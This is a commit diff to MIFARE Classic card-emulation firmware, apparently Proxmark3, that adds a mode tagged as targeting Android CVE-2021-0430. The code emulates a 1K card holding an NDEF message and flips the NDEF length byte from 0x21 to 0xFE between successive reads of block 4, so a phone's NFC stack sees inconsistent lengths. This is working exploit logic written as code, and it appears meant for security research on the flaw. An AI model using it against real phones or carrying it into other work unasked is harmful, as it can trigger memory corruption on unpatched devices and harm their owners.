fiddling with simulating ndef messages on MFC and android

2024-09-20 23:36:31 +08:00 · 2021-05-03 21:47:12 +02:00 · 2021-05-03 21:47:12 +02:00 · 218dbafdff
parent ece1f555f5
commit 218dbafdff
1 changed files with 44 additions and 1 deletions
--- a/armsrc/mifaresim.c
+++ b/armsrc/mifaresim.c
@ -519,6 +519,9 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
    LED_D_ON();
    ResetSspClk();

+    uint8_t *p_em = BigBuf_get_EM_addr();
+    uint8_t cve_flipper = 0;
+
    int counter = 0;
    bool finished = false;
    bool button_pushed = BUTTON_PRESS();
@ -561,6 +564,10 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1

        if (res == 2) { //Field is off!
            //FpgaDisableTracing();
+            if ((flags & FLAG_CVE21_0430) == FLAG_CVE21_0430) {
+                p_em[1] = 0x21;
+                cve_flipper = 0;
+            }
            LEDsoff();
            cardSTATE = MFEMUL_NOFIELD;
            if (DBGLEVEL >= DBG_EXTENDED)
@ -594,6 +601,11 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
            LED_B_OFF();
            LED_C_OFF();
            cardSTATE = MFEMUL_SELECT;
+
+            if ((flags & FLAG_CVE21_0430) == FLAG_CVE21_0430) {
+                p_em[1] = 0x21;
+                cve_flipper = 0;
+            }
            continue;
        }

@ -849,8 +861,39 @@ void Mifare1ksim(uint16_t flags, uint8_t exitAfterNReads, uint8_t *datain, uint1
                // case MFEMUL_WORK => CMD READ block
                if (receivedCmd_len == 4 && receivedCmd_dec[0] == ISO14443A_CMD_READBLOCK) {
                    blockNo = receivedCmd_dec[1];
-                    if (DBGLEVEL >= DBG_EXTENDED) Dbprintf("[MFEMUL_WORK] Reader reading block %d (0x%02x)", blockNo, blockNo);
+                    if (DBGLEVEL >= DBG_EXTENDED)
+                        Dbprintf("[MFEMUL_WORK] Reader reading block %d (0x%02x)", blockNo, blockNo);
+
+                    // android CVE 2021_0430
+                    // Simulate a MFC 1K,  with a NDEF message.
+                    // these values uses the standard LIBNFC NDEF message
+                    //
+                    // In short,  first a value read of block 4,
+                    // update the length byte before second read of block 4.
+                    // on iphone etc there might even be 3 reads of block 4.
+                    // fiddling with when to flip the byte or not,  has different effects
+                    if ((flags & FLAG_CVE21_0430) == FLAG_CVE21_0430) {
+
+                        // first block
+                        if (blockNo == 4) {
+
+                            p_em += blockNo * 16;
+                            // TLV in NDEF, flip length between 
+                            //  4 | 03 21 D1 02 1C 53 70 91 01 09 54 02 65 6E 4C 69
+                            // 0xFF means long length
+                            // 0xFE mean max short length
+
+                            // We could also have a go at message len byte at p_em[4]...
+                            if (p_em[1] == 0x21 && cve_flipper == 1) {
+                                p_em[1] = 0xFE;
+                            } else {
+                                cve_flipper++;
+                            }
+                        }
+                    }
+
                    emlGetMem(response, blockNo, 1);
+
                    if (DBGLEVEL >= DBG_EXTENDED)  {
                        Dbprintf("[MFEMUL_WORK - ISO14443A_CMD_READBLOCK] Data Block[%d]: %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x", blockNo,
                                 response[0], response[1], response[2], response[3],  response[4],  response[5],  response[6],